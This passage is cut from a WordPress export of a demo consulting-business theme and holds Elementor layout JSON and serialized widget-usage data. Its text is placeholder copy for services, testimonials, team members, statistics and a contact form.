","is_line":"yes","line_color":"#E5E5E5","hiver_line_color":"#52C5B6","icon_color":"#FFFFFF","icon_bg":"#52C5B6","icon_space":{"unit":"px","size":100,"sizes":[]},"icon_size":{"unit":"px","size":34,"sizes":[]},"radius_box":{"unit":"px","top":"50","right":"50","bottom":"50","left":"50","isLinked":true},"icon_shadow_box_shadow_type":"yes","icon_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":0,"spread":0,"color":"rgba(0,0,0,0.5)"},"title_typography_typography":"custom","title_typography_font_family":"Inter","title_typography_font_size":{"unit":"px","size":20,"sizes":[]},"title_typography_font_weight":"500"},"elements":[],"widgetType":"iiconbox2"}],"isInner":true}],"isInner":true},{"id":"6f605eb","elType":"section","settings":{"gap":"extended","structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"hide_desktop":"hidden-desktop","layout":"full_width","padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[{"id":"7607e5d","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"0fbea78","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/hourglass.svg","id":1872},"library":"svg"},"title":"Business Consulting","des":"We are working in the format of an outsourcing project office. ","is_line":"yes","line_color":"#E5E5E5","hiver_line_color":"#52C5B6","icon_color":"#FFFFFF","icon_bg":"#52C5B6","icon_space":{"unit":"px","size":100,"sizes":[]},"icon_size":{"unit":"px","size":34,"sizes":[]},"radius_box":{"unit":"px","top":"50","right":"50","bottom":"50","left":"50","isLinked":true},"icon_shadow_box_shadow_type":"yes","icon_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":0,"spread":0,"color":"rgba(0,0,0,0.5)"},"title_typography_typography":"custom","title_typography_font_family":"Inter","title_typography_font_size":{"unit":"px","size":20,"sizes":[]},"title_typography_font_weight":"500","_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"iiconbox2"}],"isInner":true},{"id":"9452047","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"e10651b","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart.svg","id":653},"library":"svg"},"title":"Project Management","des":"We are working in the format of an outsourcing project office. ","is_line":"yes","line_color":"#E5E5E5","hiver_line_color":"#52C5B6","icon_color":"#FFFFFF","icon_bg":"#52C5B6","icon_space":{"unit":"px","size":100,"sizes":[]},"icon_size":{"unit":"px","size":34,"sizes":[]},"radius_box":{"unit":"px","top":"50","right":"50","bottom":"50","left":"50","isLinked":true},"icon_shadow_box_shadow_type":"yes","icon_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":0,"spread":0,"color":"rgba(0,0,0,0.5)"},"title_typography_typography":"custom","title_typography_font_family":"Inter","title_typography_font_size":{"unit":"px","size":20,"sizes":[]},"title_typography_font_weight":"500"},"elements":[],"widgetType":"iiconbox2"}],"isInner":true},{"id":"6ac10a1","elType":"column","settings":{"_column_size":33,"_inline_size":null,"hide_desktop":"hidden-desktop","hide_tablet":"hidden-tablet","hide_mobile":"hidden-phone"},"elements":[],"isInner":true}],"isInner":true},{"id":"38cb6f4","elType":"section","settings":{"gap":"extended","structure":"30","background_background":"classic","layout":"full_width"},"elements":[{"id":"e635616","elType":"column","settings":{"_column_size":33,"_inline_size":null,"hide_tablet":"hidden-tablet","hide_mobile":"hidden-phone"},"elements":[{"id":"5a18900","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart.svg","id":653},"library":"svg"},"title":"Project Management","des":"We are working in the format of an outsourcing project office. ","is_line":"yes","line_color":"#E5E5E5","hiver_line_color":"#52C5B6","icon_color":"#FFFFFF","icon_bg":"#52C5B6","icon_space":{"unit":"px","size":100,"sizes":[]},"icon_size":{"unit":"px","size":34,"sizes":[]},"radius_box":{"unit":"px","top":"50","right":"50","bottom":"50","left":"50","isLinked":true},"icon_shadow_box_shadow_type":"yes","icon_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":0,"spread":0,"color":"rgba(0,0,0,0.5)"},"title_typography_typography":"custom","title_typography_font_family":"Inter","title_typography_font_size":{"unit":"px","size":20,"sizes":[]},"title_typography_font_weight":"500"},"elements":[],"widgetType":"iiconbox2"}],"isInner":true},{"id":"32689d8","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"41b53d3","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/deal.svg","id":887},"library":"svg"},"title":"Support Functions","des":"We are working in the format of an outsourcing project office. ","is_line":"yes","line_color":"#E5E5E5","hiver_line_color":"#52C5B6","icon_color":"#FFFFFF","icon_bg":"#52C5B6","icon_space":{"unit":"px","size":100,"sizes":[]},"icon_size":{"unit":"px","size":42,"sizes":[]},"radius_box":{"unit":"px","top":"50","right":"50","bottom":"50","left":"50","isLinked":true},"icon_shadow_box_shadow_type":"yes","icon_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":0,"spread":0,"color":"rgba(0,0,0,0.5)"},"title_typography_typography":"custom","title_typography_font_family":"Inter","title_typography_font_size":{"unit":"px","size":20,"sizes":[]},"title_typography_font_weight":"500","_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"iiconbox2"}],"isInner":true},{"id":"93c0632","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"f62425e","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/portfolio.svg","id":666},"library":"svg"},"title":"Finance Planning","des":"We are working in the format of an outsourcing project office. ","is_line":"yes","line_color":"#E5E5E5","hiver_line_color":"#52C5B6","icon_color":"#FFFFFF","icon_bg":"#52C5B6","icon_space":{"unit":"px","size":100,"sizes":[]},"icon_size":{"unit":"px","size":34,"sizes":[]},"radius_box":{"unit":"px","top":"50","right":"50","bottom":"50","left":"50","isLinked":true},"icon_shadow_box_shadow_type":"yes","icon_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":0,"spread":0,"color":"rgba(0,0,0,0.5)"},"title_typography_typography":"custom","title_typography_font_family":"Inter","title_typography_font_size":{"unit":"px","size":20,"sizes":[]},"title_typography_font_weight":"500"},"elements":[],"widgetType":"iiconbox2"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"bdc72a2","elType":"section","settings":{"layout":"full_width","gap":"no","content_position":"middle","structure":"20"},"elements":[{"id":"88319e8","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"ecf21a8","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/image1-home5.jpg","id":2251},"image_size":"full"},"elements":[],"widgetType":"image"}],"isInner":false},{"id":"24853c2","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100,"background_background":"classic","background_color":"#30344D","margin":{"unit":"%","top":"","right":"","bottom":"","left":"","isLinked":true},"padding":{"unit":"%","top":"0","right":"15","bottom":"0","left":"15","isLinked":false},"padding_tablet":{"unit":"px","top":"100","right":"80","bottom":"100","left":"80","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"60","bottom":"60","left":"60","isLinked":true}},"elements":[{"id":"87878b4","elType":"widget","settings":{"sub":"testimonials","title":"What People Say About Us","align":"center","stitle_typography_typography":"custom","stitle_typography_font_size":{"unit":"px","size":14,"sizes":[]},"stitle_typography_font_weight":"600","stitle_bottom_space":{"unit":"px","size":18,"sizes":[]},"title_color":"#FFFFFF","_margin":{"unit":"px","top":"0","right":"0","bottom":"35","left":"0","isLinked":false}},"elements":[],"widgetType":"iheading"},{"id":"a303d1b","elType":"widget","settings":{"testi_slider":[{"tcontent":"\u201cWe know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.\u201d","timage":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/testi1.png","id":2580},"tname":"Oliver Simson","tjob":"client of company","_id":"7d626c8"},{"tcontent":"\"I am so happy, my dear friend, so absorbed in the exquisite sense of mere tranquil existence, that I neglect my talents. I should be incapable of drawing a single stroke at the present moment.\"","timage":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/testi2.png","id":518},"tname":"Mary Grey","tjob":"client of company","_id":"2202cdf"},{"tcontent":"\"I am so happy, my dear friend, so absorbed in the exquisite sense of mere tranquil existence, that I neglect my talents. I should be incapable of drawing a single stroke at the present moment.\"","timage":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/testi3.png","id":519},"tname":"Samanta Fox","tjob":"client of company","_id":"03c972b"}],"loop":"true","arrows":"true","arrow_align":"bottom","dots":"false","tcontent_color":"#FFFFFF","content_typography_typography":"custom","content_typography_font_size_mobile":{"unit":"px","size":18,"sizes":[]},"name_color":"#FFFFFF","name_typography_typography":"custom","name_typography_font_size":{"unit":"px","size":24,"sizes":[]},"name_typography_font_weight":"400","job_typography_typography":"custom","job_typography_font_size":{"unit":"px","size":14,"sizes":[]},"job_typography_font_weight":"600","arrow_spacing":{"unit":"px","size":-135,"sizes":[]},"arrow_spacing_tablet":{"unit":"px","size":-122,"sizes":[]},"arrow_spacing_mobile":{"unit":"px","size":-82,"sizes":[]},"arrow_color":"#FFFFFF","arrow_bg_color":"#52C5B6","arrow_bg_hcolor":"#43B5A6"},"elements":[],"widgetType":"itestimonials2"}],"isInner":false}],"isInner":false},{"id":"aefd9d0","elType":"section","settings":{"background_position":"center center","background_repeat":"no-repeat","background_size":"cover","padding":{"unit":"px","top":"120","right":"0","bottom":"286","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"90","right":"0","bottom":"60","left":"0","isLinked":false},"padding_tablet":{"unit":"px","top":"110","right":"0","bottom":"110","left":"0","isLinked":false}},"elements":[{"id":"4518b70","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"195d6de","elType":"section","settings":{"structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"35d070d","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true},{"id":"21a5ec1","elType":"column","settings":{"_column_size":33,"_inline_size":57.33200000000000073896444519050419330596923828125,"_inline_size_tablet":80},"elements":[{"id":"6cdef6f","elType":"widget","settings":{"sub":"Improve Your Business","title":"Our Skilled Team","header_size":"h3","align":"center","_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"stitle_bg":"#4B83FC1A","title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":30,"sizes":[]},"is_highlight":"","stitle_typography_typography":"custom","stitle_typography_font_size":{"unit":"px","size":14,"sizes":[]},"stitle_typography_font_weight":"600"},"elements":[],"widgetType":"iheading"},{"id":"07d1369","elType":"widget","settings":{"editor":"<p>We help you see the world differently, discover opportunities you may never have imagined and achieve results that bridge what is with what can be.<\/p>","align":"center"},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"dbebc16","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true}],"isInner":true},{"id":"ed60286","elType":"section","settings":{"gap":"extended","structure":"40","padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"aae4ed3","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"e530f94","elType":"widget","settings":{"member_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/team1.jpg","id":524},"member_name":"Monica Black","member_extra":"FINANCE MANAGER ","social_share":[{"title":"Pinterest","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brand"},"_id":"a5da75d"},{"title":"Facebook","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-facebook-f","library":"fa-brand"},"_id":"837324c"},{"title":"Twitter","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-twitter","library":"fa-brand"},"_id":"cbcc844"}],"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":20,"sizes":[]},"job_typography_typography":"custom","job_typography_font_size":{"unit":"px","size":12,"sizes":[]},"title_typography_font_weight":"400"},"elements":[],"widgetType":"imember"}],"isInner":true},{"id":"89ebc78","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"60ee7a1","elType":"widget","settings":{"member_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/team2.jpg","id":525},"member_name":"Peter Perish","member_extra":"chief business project","social_share":[{"title":"Pinterest","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brand"},"_id":"a5da75d"},{"title":"Facebook","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-facebook-f","library":"fa-brand"},"_id":"837324c"},{"title":"Twitter","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-twitter","library":"fa-brand"},"_id":"cbcc844"}],"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":20,"sizes":[]},"job_typography_typography":"custom","job_typography_font_size":{"unit":"px","size":12,"sizes":[]},"title_typography_font_weight":"400"},"elements":[],"widgetType":"imember"}],"isInner":true},{"id":"48ab034","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"b54faf3","elType":"widget","settings":{"member_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/team3.jpg","id":526},"member_name":"Olivia Woodson","member_extra":"international consultant","social_share":[{"title":"Pinterest","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brand"},"_id":"a5da75d"},{"title":"Facebook","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-facebook-f","library":"fa-brand"},"_id":"837324c"},{"title":"Twitter","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-twitter","library":"fa-brand"},"_id":"cbcc844"}],"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":20,"sizes":[]},"job_typography_typography":"custom","job_typography_font_size":{"unit":"px","size":12,"sizes":[]},"title_typography_font_weight":"400"},"elements":[],"widgetType":"imember"}],"isInner":true},{"id":"9d3d46c","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"1f7c3a6","elType":"widget","settings":{"member_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/team4.jpg","id":527},"member_name":"Peter Adams","member_extra":"co-founder of company","social_share":[{"title":"Pinterest","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brand"},"_id":"a5da75d"},{"title":"Facebook","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-facebook-f","library":"fa-brand"},"_id":"837324c"},{"title":"Twitter","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-twitter","library":"fa-brand"},"_id":"cbcc844"}],"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":20,"sizes":[]},"job_typography_typography":"custom","job_typography_font_size":{"unit":"px","size":12,"sizes":[]},"title_typography_font_weight":"400"},"elements":[],"widgetType":"imember"}],"isInner":true}],"isInner":true},{"id":"f155006","elType":"widget","settings":{"align":"center","text":"Explore More ","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz-finance\/our-team\/","is_external":"","nofollow":"","custom_attributes":""},"btn_bg":"#30344D","button_background_hover_color":"#52C5B6"},"elements":[],"widgetType":"ibutton"}],"isInner":false}],"isInner":false},{"id":"e089e48","elType":"section","settings":{"content_width":{"unit":"px","size":1350,"sizes":[]},"margin":{"unit":"px","top":"-166","right":0,"bottom":"0","left":0,"isLinked":false},"margin_tablet":{"unit":"px","top":"0","right":0,"bottom":"0","left":0,"isLinked":false},"z_index":1,"padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"110","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"93bd0bc","elType":"column","settings":{"_column_size":100,"_inline_size":null,"background_background":"classic","background_color":"#52C5B6","border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"box_shadow_box_shadow_type":"yes","box_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":30,"spread":0,"color":"rgba(0, 0, 0, 0.12)"}},"elements":[{"id":"c9cdb97","elType":"section","settings":{"layout":"full_width","gap":"extended","structure":"40","padding":{"unit":"px","top":"45","right":"90","bottom":"45","left":"90","isLinked":false},"padding_mobile":{"unit":"px","top":"30","right":"30","bottom":"30","left":"30","isLinked":true}},"elements":[{"id":"fa92034","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"c744b9e","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/strategy.svg","id":1871},"library":"svg"},"title":"Businesses Guided <br>Over Thirty Years","number":"350","icon_space":{"unit":"px","size":12,"sizes":[]},"icon_color":"#FFFFFF","number_color":"#FFFFFF","number_typography_typography":"custom","number_typography_font_family":"Prata","number_typography_font_size":{"unit":"px","size":48,"sizes":[]},"title_space":{"unit":"px","size":8,"sizes":[]},"title_color":"#FFFFFF","_margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"number_typography_font_weight":"400"},"elements":[],"widgetType":"icounter2"}],"isInner":true},{"id":"aeb5e92","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"c4f0895","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/files.svg","id":1869},"library":"svg"},"title":"Finished & Supported <br>Incredible Projects","number":"215","icon_space":{"unit":"px","size":12,"sizes":[]},"icon_color":"#FFFFFF","number_color":"#FFFFFF","number_typography_typography":"custom","number_typography_font_family":"Prata","number_typography_font_size":{"unit":"px","size":48,"sizes":[]},"title_space":{"unit":"px","size":8,"sizes":[]},"title_color":"#FFFFFF","_margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"number_typography_font_weight":"400"},"elements":[],"widgetType":"icounter2"}],"isInner":true},{"id":"ab1b7f8","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"e387f05","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/networking.svg","id":1870},"library":"svg"},"title":"Years of Experience <br>& Business Consulting","number":"15","after_number":"+","icon_space":{"unit":"px","size":12,"sizes":[]},"icon_color":"#FFFFFF","number_color":"#FFFFFF","number_typography_typography":"custom","number_typography_font_family":"Prata","number_typography_font_size":{"unit":"px","size":48,"sizes":[]},"title_space":{"unit":"px","size":8,"sizes":[]},"title_color":"#FFFFFF","number_typography_font_weight":"400"},"elements":[],"widgetType":"icounter2"}],"isInner":true},{"id":"973b3bd","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"8541ede","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/certificate.svg","id":1867},"library":"svg"},"title":"Business Excellence <br>Awards Achieved","number":"20","after_number":"+","icon_space":{"unit":"px","size":12,"sizes":[]},"icon_color":"#FFFFFF","number_color":"#FFFFFF","number_typography_typography":"custom","number_typography_font_family":"Prata","number_typography_font_size":{"unit":"px","size":48,"sizes":[]},"title_space":{"unit":"px","size":8,"sizes":[]},"title_color":"#FFFFFF","number_typography_font_weight":"400"},"elements":[],"widgetType":"icounter2"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"28bf5b8","elType":"section","settings":{"padding":{"unit":"px","top":"215","right":"0","bottom":"0","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"0","left":"0","isLinked":false},"padding_tablet":{"unit":"px","top":"115","right":"0","bottom":"60","left":"0","isLinked":false},"background_background":"classic","background_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bg1-home5.jpg","id":2269},"background_position":"top center","background_repeat":"no-repeat","margin":{"unit":"px","top":"-104","right":0,"bottom":"0","left":0,"isLinked":false},"margin_tablet":{"unit":"px","top":"0","right":0,"bottom":"0","left":0,"isLinked":false}},"elements":[{"id":"2a86ee7","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"625142c","elType":"section","settings":{"layout":"full_width","content_position":"bottom","structure":"20","margin":{"unit":"px","top":"0","right":0,"bottom":"50","left":0,"isLinked":false}},"elements":[{"id":"39c70ee","elType":"column","settings":{"_column_size":50,"_inline_size":null},"elements":[{"id":"b0fa89d","elType":"widget","settings":{"sub":"business blog","title":"Read Our Latest Insights","stitle_color":"#FFFFFF","stitle_typography_typography":"custom","stitle_typography_font_size":{"unit":"px","size":14,"sizes":[]},"stitle_typography_font_weight":"600","title_color":"#FFFFFF","_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iheading"}],"isInner":true},{"id":"1833dd2","elType":"column","settings":{"_column_size":50,"_inline_size":null},"elements":[{"id":"b24fa83","elType":"widget","settings":{"align":"right","align_mobile":"left","text":"view all","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz-finance\/blog\/","is_external":"","nofollow":"","custom_attributes":""},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"10","left":"0","isLinked":false},"button_text_color":"#1B1D21","btn_bg":"#FFFFFF","hover_color":"#FFFFFF","button_background_hover_color":"#52C5B6"},"elements":[],"widgetType":"ibutton"}],"isInner":true}],"isInner":true},{"id":"9a0ae26","elType":"widget","settings":{"post_num":3,"dots":"false"},"elements":[],"widgetType":"ipostcarousel"}],"isInner":false}],"isInner":false},{"id":"9b9603f","elType":"section","settings":{"structure":"20","padding":{"unit":"px","top":"60","right":"0","bottom":"0","left":"0","isLinked":false},"background_background":"classic","background_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/overlay-home5.png","id":2309},"background_position":"bottom left","background_repeat":"no-repeat","background_xpos":{"unit":"%","size":-2,"sizes":[]},"background_ypos":{"unit":"%","size":100,"sizes":[]},"background_size_mobile":"initial","background_bg_width_tablet":{"unit":"px","size":0,"sizes":[]},"background_bg_width_mobile":{"unit":"px","size":0,"sizes":[]},"reverse_order_tablet":"reverse-tablet","reverse_order_mobile":"reverse-mobile"},"elements":[{"id":"de2de47","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"4628471","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/image2-home5.png","id":2281},"image_size":"full","align":"left","_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"-50","isLinked":false},"align_tablet":"left","_margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":false},{"id":"13ccd0a","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"90262c4","elType":"widget","settings":{"sub":"TO BECOME A CLIENT","title":"Ready to Get Started?","header_size":"h3","stitle_color":"#52C5B6","stitle_typography_typography":"custom","stitle_typography_font_size":{"unit":"px","size":14,"sizes":[]},"stitle_typography_font_weight":"600","_margin":{"unit":"px","top":"50","right":"0","bottom":"20","left":"0","isLinked":false},"_margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false}},"elements":[],"widgetType":"iheading"},{"id":"7c9033d","elType":"widget","settings":{"editor":"<p>Please, fulfill the form to get a consultation. After processing the data, a personal manager will contact you.<\/p>","_margin":{"unit":"px","top":"0","right":"100","bottom":"30","left":"0","isLinked":false},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"5c6f1ca","elType":"widget","settings":{"cf7":"4","css_responce":"color:#000;"},"elements":[],"widgetType":"ictf7"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:20:{s:7:"heading";a:3:{s:5:"count";i:6;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:3:{s:5:"title";i:6;s:5:"align";i:1;s:11:"header_size";i:3;}}s:5:"style";a:1:{s:19:"section_title_style";a:7:{s:11:"title_color";i:3;s:21:"typography_typography";i:3;s:22:"typography_font_family";i:3;s:20:"typography_font_size";i:3;s:27:"typography_font_size_mobile";i:2;s:22:"typography_font_weight";i:3;s:25:"typography_text_transform";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:8:"_padding";i:6;s:15:"_padding_mobile";i:2;}}}}s:11:"text-editor";a:3:{s:5:"count";i:9;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:14:"section_editor";a:1:{s:6:"editor";i:9;}}s:5:"style";a:1:{s:13:"section_style";a:7:{s:10:"text_color";i:3;s:21:"typography_typography";i:2;s:22:"typography_font_family";i:2;s:20:"typography_font_size";i:2;s:27:"typography_font_size_mobile";i:1;s:22:"typography_font_weight";i:2;s:5:"align";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:4:{s:8:"_padding";i:5;s:15:"_padding_mobile";i:1;s:7:"_margin";i:1;s:14:"_margin_mobile";i:1;}}}}s:11:"ivideopopup";a:3:{s:5:"count";i:1;s:15:"control_percent";i:5;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:5:"align";i:1;s:7:"caption";i:1;s:5:"vlink";i:1;}}s:5:"style";a:2:{s:13:"style_section";a:6:{s:9:"btn_width";i:1;s:16:"btn_width_mobile";i:1;s:9:"btn_color";i:1;s:16:"btn_border_color";i:1;s:6:"btn_bg";i:1;s:10:"btn_circle";i:1;}s:15:"caption_section";a:1:{s:13:"caption_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_z_index";i:1;}}}}s:6:"column";a:3:{s:5:"count";i:58;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:6:"layout";a:1:{s:6:"layout";a:2:{s:12:"_inline_size";i:58;s:19:"_inline_size_tablet";i:43;}}s:8:"advanced";a:2:{s:16:"section_advanced";a:6:{s:13:"margin_tablet";i:9;s:6:"margin";i:4;s:13:"margin_mobile";i:1;s:7:"padding";i:1;s:14:"padding_tablet";i:1;s:14:"padding_mobile";i:1;}s:19:"_section_responsive";a:3:{s:11:"hide_tablet";i:3;s:11:"hide_mobile";i:3;s:12:"hide_desktop";i:1;}}s:5:"style";a:2:{s:13:"section_style";a:2:{s:21:"background_background";i:2;s:16:"background_color";i:2;}s:14:"section_border";a:3:{s:13:"border_radius";i:1;s:26:"box_shadow_box_shadow_type";i:1;s:21:"box_shadow_box_shadow";i:1;}}}}s:5:"ictf7";a:3:{s:5:"count";i:2;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"section_content";a:1:{s:3:"cf7";i:2;}}s:5:"style";a:1:{s:13:"section_style";a:2:{s:16:"css_input_submit";i:1;s:12:"css_responce";i:2;}}}}s:7:"section";a:3:{s:5:"count";i:28;s:15:"control_percent";i:4;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:4:{s:6:"layout";i:16;s:3:"gap";i:13;s:16:"content_position";i:7;s:13:"content_width";i:1;}s:17:"section_structure";a:1:{s:9:"structure";i:18;}}s:5:"style";a:2:{s:18:"section_background";a:12:{s:21:"background_background";i:7;s:16:"background_color";i:2;s:16:"background_image";i:4;s:19:"background_position";i:5;s:17:"background_repeat";i:5;s:15:"background_size";i:3;s:21:"background_attachment";i:1;s:15:"background_xpos";i:1;s:15:"background_ypos";i:1;s:22:"background_size_mobile";i:1;s:26:"background_bg_width_tablet";i:1;s:26:"background_bg_width_mobile";i:1;}s:14:"section_border";a:1:{s:13:"border_radius";i:1;}}s:8:"advanced";a:2:{s:16:"section_advanced";a:8:{s:7:"padding";i:21;s:14:"padding_mobile";i:16;s:11:"css_classes";i:3;s:11:"_element_id";i:3;s:14:"padding_tablet";i:4;s:6:"margin";i:3;s:13:"margin_tablet";i:2;s:7:"z_index";i:1;}s:19:"_section_responsive";a:3:{s:12:"hide_desktop";i:1;s:20:"reverse_order_tablet";i